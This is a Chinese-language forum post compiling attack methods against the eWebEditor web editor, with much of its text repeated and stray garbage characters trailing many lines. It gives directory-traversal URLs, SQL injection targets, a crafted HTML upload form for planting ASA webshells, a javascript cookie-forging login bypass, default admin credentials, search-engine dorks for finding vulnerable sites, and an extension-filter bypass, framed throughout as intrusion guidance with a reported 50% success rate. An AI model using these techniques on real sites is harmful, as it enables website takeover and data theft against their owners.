eWebEditor.asp?id=45&style=standard1 样式调用
' T0 S; c- i. p, N5 ~7 t" Z0 U. W+ l2 n( F5 t! y' Y
( V0 w* F2 j- I2 y: D/ G I
/edit/admin_uploadfile.asp?id=14&dir=../../..
! m: a9 e8 ~0 ?2 U3 h V' ]7 t可以浏览网站目录 ../自己加或者减; `4 x k- t' i6 ?
" F! v ^4 h9 R2 o
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞. G- x2 C. E. X
简单利用就是/ l- M: q9 t* N5 o; p L" C
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200* M( p# M6 l8 w9 m
http://www.siqinci.com/ewebedito ... amp;style=full_v200
5 c, c( a. g% K8 j$ m* n可以利用nbsi进行猜解,对此进行注入3 J5 y2 ]' i2 G/ f6 a& ?) k- M2 O* u
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的, |8 h$ y8 Y* C7 }
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
$ v4 P3 X4 S- p在action下面
% B( N5 ]: i9 A% O0 Z* g9 V) B<form action="http://*********/edit/upload.asp?action=save&type=ASA&style=test" method=post name=myform enctype="multipart/form-data">
" i6 r% f! R* V7 i6 U& n5 \& x1 [<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">' _( Z* b F- a! U+ `- }& n0 q6 K
<input type="submit" name="uploadfile" value="提交">" w6 E2 d Y# n
<input type=hidden name=originalfile value="">* @' p+ n/ v+ O N; I7 T4 T( b
</form>
8 E8 b. }; }; I) f------------------------------------------------------------------------------------------------------------------------------------------------
1 g2 c$ T7 ]7 s) t8 j+ q<input type="submit" name="uploadfile" value="提交"> 放在action后头. [$ X2 \0 F" L+ T( Y$ G* M
,适合用于在ewebeditor后台那个预览那里出来的 比如上传图片那里,有些时候上传页面弹不出来,就可以用upload.asp?action=save&type=ASA&style=test 这个本地来提交,不过这个东西还是要数据库里上传类型有ASA才可以传得上。
" o6 d' l, h- Z. m5 [, J/ L3 |! @$ c* \8 W8 I
0 o9 a! D1 |) t7 g. J
' r$ n8 g% {7 K( m' W A+ q6 w" D) Z
; W h# z" e. g3 ]2 A, d& pEwebeditor最新漏洞及漏洞大全[收集] (图)
4 a8 X/ _. w6 [3 d" w3 w- h本帖最后由 administrator 于 2009-7-7 21:24 编辑1 c3 _( J* r* ]. l
( o @; d, p7 A0 H
以下文章收集转载于网络
$ W* O9 \4 ~6 A#主题描述# ewebeditor 3.8漏洞[php]! v0 g3 H. J; g" p& t; Q
--------------------------------------------------------------------------------------------
" d( f9 }8 h3 H! N, e, c$ [8 a#内容#
4 D' C, p5 M) f2 @php版ewebeditor 3.8的漏洞
* c) q3 D1 X" r- X h7 ~, Lphp版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道,在这里我说说利用方法:
5 F' }, m5 n5 W+ e+ o1 首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了,必须是出错的时候,然后这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,
' T; e' q$ W* J2 然后输入正常情况才能访问的文件../ewebeditor/admin/default.php就可以进后台了0 a) W$ Z) m7 E, h
3 后面的利用和asp一样,新增样式修改上传,就ok了
1 l& `, h. c7 f( H) z( X7 M: L4 j1 P测试一下asp 2.8版本的,竟然一样可以用,爽,看来asp版的应该可以通杀(只测试2.8的,貌似2.8是最高版本的)) J3 q5 Q |% e0 W) R/ h
aspx的版本../ewebeditor/admin/upload.aspx添好本地的cer的Shell文件,在浏揽器输入javascript:lbtnUpload.click();就能得到shell0 N% ?0 f3 A3 p$ G7 J
jsp的上传漏洞以及那个出了N久了,由于没有上传按钮,选择好要上传的shell,直接回车就可以了2 Z; W& R' J8 L' c2 ^# A
--------------------------------------------------------------------------------------------
* k8 y# A& l- g, a' W% ?5 a! U* E, C" G. R1 F/ J" O9 s
5 h5 ^1 p' J' r! t2 w算是比较全面的ewebeditor编辑器的漏洞收集,现在的网站大多数用的都是ewebeditor编辑器,所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。
, i. f; A* q, F- U3 g
S' P' `" C& v, c漏洞更新日期TM: 2009 2 9日 转自zake’S Blog
! d6 M; N. z6 Q4 t5 A ewebeditor最新漏洞。这个程序爆漏洞一般都是直接上传的漏洞,首先在本地搭建一个ASP环境重命名一个木马名字例如:1.gif.asp这样的就OK了
6 A7 d |' s$ b) g: |, p那么接下来完美本地搭建一个环境你可以用WEB小工具搭建一个,目的就是让远程上传。/pic/3/a2009-6-4-7341a1.gif.asp搭建好了 ,在官方的地方执行网络地址+ v1 ^% S! y6 v) J/ m% Z& `* w
! Y/ L& O' o' y0 i g, j0 m1 J
0 S- B" n2 O: M4 `+ G然后确定以后,这里是最关键的一部!
( v. t2 v8 D# ?5 e) X这里点了远程上传以后,再提交得到木马地址 U' C% _# r3 P7 y- B) B2 \8 g: x
由于官方在图片目录做了限制 导致不能执行ASP脚本而没能拿到WEB权限$ j4 E% G" ~% i( O
属于安全检测漏洞版本ewebeditor v6.0.0
& x/ J6 _1 N; U
3 s, i, n2 n7 F# i- q8 ~2 h以前的ewebeditor漏洞:' C, Y0 v" w9 T3 T; D
3 n1 U4 o) b$ ?; M$ L
ewebeditor注入漏洞7 X$ j% e" a! t# ] E. V8 _
) K+ _5 W1 T/ t* D: j- t: M7 c大家都知道ewebeditor编辑器默认的数据库路径db/ewebeditor.mdb2 u. Z8 B3 G4 Y) ^) |
默认后台地址是admin_login.asp,另外存在遍历目录漏洞,如果是asp后缀的数据库还可以写入一句话- w3 }9 x7 D8 K) Y8 U
今天我给大家带来的也是ewebeditor编辑器的入侵方法 ]( g& u' N8 s! J) r P. v
不过一种是注入,一种是利用upload.asp文件,本地构造
. c3 l3 T5 B1 o% b$ aNO1:注入: T, u5 P8 J; J5 ^: k+ p2 j
http://www.XXX.com/ewebeditor200 ... amp;style=full_v200+ G+ N6 B7 g" s3 l" b2 h+ T* l/ D4 t
编辑器ewebedior7以前版本通通存在注入
, Y9 z! g R7 i; P$ [直接检测不行的,要写入特征字符 s" X! q7 [8 y- m0 |; g
我们的工具是不知道ewebeditor的表名的还有列名
1 Q) _1 H' g, i我们自己去看看2 M4 v' N2 s7 z' B# ?0 y
哎。。先表吧
6 ?# x% M2 q, g8 J要先添加进库
7 J" Z- T2 v, y. l& N开始猜账号密码了
$ [, z. v) W, S$ T' Y5 l8 [* m1 F/ p我们==
6 s" t7 \( z) D8 O6 f心急的往后拉
, d+ B2 e( K; w7 a( M- z; A+ M" A出来了
: x/ V# c) S3 ]/ K9 O[sys_username]:bfb18022a99849f5 chaoup[sys_userpass]:0ed08394302f7d5d 8511201 o% W# b' L/ N$ `
对吧^_^5 d. H2 N4 S6 ~! O" l1 v. ?
后面不说了
4 |" ^0 O& O9 u, z. r. eNO2:利用upload.asp文件,本地构造上传shell. l7 v( ?; ]; u
大家看这里
8 } H; o Z* z! t. U, Vhttp://www.siqinci.com/ewebedito ... lepreview&id=37
, J0 e5 D! n% ?! B如果遇见这样的情况又无法添加工具栏是不是很郁闷
# t7 G, c4 G6 v Y6 ^现在不郁闷了,^_^源源不一般' G) X( `- | x3 v' c
我们记录下他的样式名“aaa”1 H# q* o. f+ F$ c
我已经吧upload.asp文件拿出来了
4 o# g- ~# a: h我们构造下
1 a8 c$ H0 o, k, m6 a9 M1 oOK,我之前已经构造好了
$ O1 c" b' [0 J其实就是这里6 _7 V- o2 E5 G6 r6 ]
<form action=”地址/path/upload.asp?action=save&type=&style=样式名” method=post name=myform enctype=”multipart/form-data”>
+ K5 S+ p2 \, X% n% n( n4 f, J/ N<input type=file name=uploadfile size=1 style=”width:100%”>& g$ j9 }7 j; W P% {
<input type=submit value=”上传了”></input>
, i# D0 G( W7 [9 W8 A</form> F$ [3 e# j: F5 l- G
下面我们运行他上传个大马算了
$ o) }* a4 X4 y2 DUploadFile上传进去的在这个目录下% f3 D3 z( [8 i2 Q$ n) c' p
2008102018020762.asa
& F# X! |& R6 h: x2 f: o1 v5 z- P+ I9 t
过往漏洞:
0 P x+ M8 d; s8 g; u1 o# p/ U: [ q& q# ?
首先介绍编辑器的一些默认特征:/ ? w/ U5 |% b3 ?; Y/ b
默认登陆admin_login.asp& ^8 R: ]& D. j
默认数据库db/ewebeditor.mdb2 }3 e- Q/ u% b4 G7 B' w( _1 K! e& s
默认帐号admin 密码admin或admin888- L9 S& g% P( Z7 p! o. a* c- {
搜索关键字:”inurl:ewebeditor” 关键字十分重要
% U) j" R) s/ f( H% A有人搜索”eWebEditor - eWebSoft在线编辑器”
7 |5 N; ?( C6 m L/ V根本搜索不到几个~. b- }9 ?6 H+ l. b' M1 m' [
baidu.google搜索inurl:ewebeditor
7 ?5 I9 I p$ u |& y& E几万的站起码有几千个是具有默认特征的~
+ E6 q# P! I9 ?' k' M0 {那么试一下默认后台; T* p# n. e; H% u$ t
http://www.xxx.com.cn/admin/ewebeditor/admin_login.asp
4 X7 l3 ?0 }% A; @2 q试默认帐号密码登陆。
) j% Q! C1 L+ ^2 u# i' m9 v利用eWebEditor获得WebShell的步骤大致如下:
4 Y* E$ V( ?6 ^. z# v" u r1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
K$ K0 d; }8 i3 S' g2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID=’eWebEditor1′ src=’/edit/ewebeditor.asp?id=content&style=web’ frameborder=0 scrolling=no width=’550′ HEIGHT=’350′></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src=’***’中的“***”,这就是eWebEditor路径。% A' q2 l8 ?0 S! ]* q
3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。% g2 c9 m% `8 S) ~6 t! H0 c
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!. U: V. A3 i. F* P# H/ Z, p( m
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
! J! m8 R" U( e/ ]) }( \3 U然后在上传的文件类型中增加“asa”类型。6 q1 p7 H1 Y* x1 ~' O
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。0 j* Y Y, _: ` T# q+ y( [8 ]
漏洞原理' C2 U: n3 r" a0 [# G( r- G, D! I
漏洞的利用原理很简单,请看Upload.asp文件:# w- X# D& N' f k
任何情况下都不允许上传asp脚本文件* |2 g h! i1 J5 [; F0 {4 X6 Z7 l) Y
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)7 D" ?$ i& y' G. a' u9 \1 J8 X# M/ y; q
因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!5 S; o4 c( o, ]9 `; F7 ^+ h+ ]
高级应用4 m! n$ d5 q' \ y. B
eWebEditor的漏洞利用还有一些技巧:" |$ C4 P6 [0 E# E; T
1.使用默认用户名和密码无法登录。; \* }; U% ~/ m g
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法破解,那就当自己的运气不好了。4 J# _* Y6 i/ i2 [. u2 |( ]
2.加了asa类型后发现还是无法上传。
3 m' x( ~5 U. c# r6 V2 l应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)一句上修改,我就看见过一个站长是这样修改的:- Y+ k/ M) K2 q
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), “ASP”, “”), “CER”, “”), “ASA”, “”), “CDX”, “”), “HTR”, “”)
& q& e$ W! q. T/ v: l, @猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
- ~, |" U. U% D6 S3.上传了asp文件后,却发现该目录没有运行脚本的权限。
( }. |* G$ B! @. J: S呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。* U1 e9 j. D/ Z7 B# O7 `
4.已经使用了第2点中的方法,但是asp类型还是无法上传。 Y& L* a; u0 |( @
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
. q8 B7 G# z# U L- \后记; }8 w& n! m% I" Y- d
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上!
x. p- t+ ^3 P基本入侵基础漏洞. L/ n. s% [. z' Z0 G
eWebEditor 漏洞
3 G. S9 P- Z* J1 z- P2 p' @, t/ {" e1 b3 N3 O. X
各位站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这才想起应该写一篇文章和大家共享一下,同时也请广大已经使用了eWebEditor的站长赶紧检查一下自己的站点。要不然,下一个被黑的就是你哦! ( i" ~8 J( E5 _) s( \# F4 S
) d6 y# q2 q- i3 k/ b/ w% H漏洞利用
0 h% c1 [0 m1 ~0 B" w c3 B1 p9 l4 W+ }利用eWebEditor获得WebShell的步骤大致如下:
- ]0 C2 _; y, s1.确定网站使用了eWebEditor。一般来说,我们只要注意发表帖子(文章)的页面是否有类似做了记号的图标,就可以大致做出判断了。
3 _# c" \# B6 e0 ~7 k2.查看源代码,找到eWebEditor的路径。点击“查看源代码”,看看源码中是否存在类似“<iframe ID='eWebEditor1' src='/edit/ewebeditor.asp?id=content&style=web' frameborder=0 scrolling=no width='550' HEIGHT='350'></iframe>”的语句。其实只有发现了存在这样的语句了,才可以真正确定这个网站使用了 eWebEditor。然后记下src='***'中的“***”,这就是eWebEditor路径。
9 {9 V7 [0 O4 O2 S3.访问eWebEditor的管理登录页面。eWebEditor的默认管理页面为admin_login.asp,和ewebeditor.asp在同一目录下。以上面的路径为例,我们访问的地址为:http://www.***.net/edit/admin_login.asp,看看是否出现了登录页面。( a6 L3 a( ~7 e" A9 F
如果没有看到这样的页面,说明管理员已经删除了管理登录页面,呵呵,还等什么,走人啊,换个地方试试。不过一般来说,我很少看到有哪个管理员删了这个页面,试试默认的用户名:admin,密码:admin888。怎么样?成功了吧(不是默认账户请看后文)!4 D( |0 e# I, L
4.增加上传文件类型。点击“样式管理”,随便选择列表中底下的某一个样式的“设置,为什么要选择列表中底下的样式?因为eWebEditor自带的样式是不允许修改的,当然你也可以拷贝一个新的样式来设置。
, [1 p+ p0 @* {# O" l. z. N5 M; r( g# W* O
然后在上传的文件类型中增加“asa”类型。
1 ?, j( b' F( V: F- ]4 L* E) S. _- p" P
5.上传ASP木马,获得WebShell。接下来将ASP木马的扩展名修改为asa,就可以简单上传你的ASP木马了。不要问我怎么上传啊,看到 “预览” 了吗?点击“预览”,然后选择“插入其它文件”的按钮就可以了。8 b; P" T; }$ }" z8 x% f
; {0 l9 _' z/ N$ v& ? }
5 q# A( |" O- ?$ M$ `5 O( }0 x& m
漏洞原理
9 y. x: @, I) u u- W漏洞的利用原理很简单,请看Upload.asp文件:
H0 f. z1 @/ |' p( Q9 l6 ~6 e7 t任何情况下都不允许上传asp脚本文件
S$ j: y# I& J( Q$ z4 ?sAllowExt = replace(UCase(sAllowExt), "ASP", "")
8 I: P% D3 ~; W3 l因为eWebEditor仅仅过滤了ASP文件。记得我第一次使用eWebEditor时就在纳闷:既然作者已经知道asp文件需要过滤,为什么不同时过滤asa、cer等文件呢?也许这就是对免费用户不负责任的表现吧!
, \. f; c8 K7 c4 P1 ~5 _" F
+ @1 i F% K O1 J y8 L7 V7 A% e Z高级应用9 K1 h0 d* \; z% w
eWebEditor的漏洞利用还有一些技巧:
3 c- }5 t+ f1 ~6 s0 P% |1.使用默认用户名和密码无法登录。- U9 S# E, A' O4 X% L. i" W' o
请试试直接下载db目录下的ewebeditor.mdb文件,用户名和密码在eWebEditor_System表中,经过了md5加密,如果无法下载或者无法****,那就当自己的运气不好了。0 z; `9 W$ |2 y1 |8 r
2.加了asa类型后发现还是无法上传。
% b/ x% X, ^" W9 i" Z应该是站长懂点代码,自己修改了Upload.asp文件,但是没有关系,按照常人的思维习惯,往往会直接在sAllowExt = replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看见过一个站长是这样修改的:
5 Q7 E5 E6 _* X5 h! X8 OsAllowExt = replace(replace(replace(replace(replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")' Y/ W" Z6 L, Q- T
猛一看什么都过滤了,但是我们只要在上传类型中增加“aaspsp”,就可以直接上传asp文件了。呵呵,是不是天才的想法?“aaspsp”过滤了 “asp”字符后,反而变成了“asp”!顺便告诉大家一个秘密,其实动网论坛7.0 sp2中也可以利用类似的方法绕过对扩展名的过滤。
6 a' P: M3 i0 v, l! N3.上传了asp文件后,却发现该目录没有运行脚本的权限。
! d. u2 Y* Z9 |0 V. R+ d呵呵,真是好笨啊,上传类型可以改,上传路径不是也可以修改的吗?仔细看看图四。" G1 r% u& @/ ?- l5 ]' L
4.已经使用了第2点中的方法,但是asp类型还是无法上传。! G6 S7 ~5 f( l& {- ]; U+ c. Y
看来站长肯定是一个写asp的高手,但是我们还有最后一招来对付他:看到图三中的“远程类型”了吗?eWebEditor能够设定自动保存远程文件的类型,我们可以加入asp类型。但是如何才能让远程访问的asp文件能够以源码形式保存呢?方法是很多的,最简单的方法是将IIS中的“应用文件映射”中的 “asp”删除。
" n( v6 ?0 w/ R3 F1 ^! e. l: ~. ^
后记% R) F9 P. Z/ w. _
根据自己的经验,几乎只要能进入eWebEditor的后台管理,基本上都可以获得WebShell。在Google上搜索 “ewebeditor.asp?id=”能够看到长达十多页的相关信息,我大致抽查了其中几个,发现成功率约为50%。还不错吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索几个来练练手。要命的是eWebEditor的官方网站和帮助文件中根本没有这方面的安全提示。还有,我发现官方提供的测试系统并不存在类似的漏洞,看来不是他们不知道,而是没有把免费用户的网络安危放在心上! |
发表于 2012-9-13 17:00:58
收藏
支持
反对